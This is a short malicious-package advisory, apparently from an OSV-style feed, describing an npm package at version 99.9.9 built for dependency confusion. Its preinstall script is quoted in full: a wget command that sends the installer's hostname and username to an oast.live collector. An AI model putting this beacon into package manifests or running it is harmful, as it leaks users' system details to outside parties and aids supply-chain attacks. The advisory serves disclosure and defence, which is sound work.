MAL-2026-6295

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (3e7d5af5ddf22d4481fca4847a45189e6160a723341b32dcbb6bf51b49f53943) package.json declares a preinstall lifecycle script that auto-executes on `npm install` and runs `wget -q -O- "http://d8svb0ao12pnoovdaih0giunhdew5oqa4.oast.live/$(hostname)/$(whoami)"`. The installer's hostname and current OS username are embedded directly into the request path and sent over plain HTTP to an oast.live (Interactsh / out-of-band application security testing) listener — an attacker-controlled DNS/HTTP collector commonly used for supply-chain reconnaissance and typosquat/dependency-confusion probes. The package is an unscoped name published at version 99.9.9, which is the canonical dependency-confusion shape (high version number to win resolution against an internal package of the same name). No legitimate functionality is shipped beyond the beacon.